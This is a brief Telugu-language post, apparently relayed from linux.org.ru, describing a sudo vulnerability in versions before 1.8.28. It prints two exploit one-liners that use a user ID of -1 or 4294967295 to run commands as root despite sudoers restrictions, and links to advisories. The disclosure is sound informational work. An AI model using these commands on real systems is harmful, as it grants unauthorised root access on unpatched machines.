సుడోలో దుర్బలత్వం

sudoలోని బగ్ ఏదైనా ఎక్జిక్యూటబుల్ ఫైల్‌ను రూట్‌గా అమలు చేయడానికి మిమ్మల్ని అనుమతిస్తుంది, ఒకవేళ /etc/sudoers దానిని ఇతర వినియోగదారులచే అమలు చేయడానికి మరియు రూట్ కోసం నిషేధించబడితే.

లోపం యొక్క దోపిడీ చాలా సులభం:

sudo -u#-1 id -u

లేదా:

sudo -u#4294967295 id -u

1.8.28కి ముందు sudo యొక్క అన్ని వెర్షన్‌లలో ఎర్రర్ ఉంది

వివరాలు:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html

https://www.sudo.ws/alerts/minus_1_uid.html

మూలం: linux.org.ru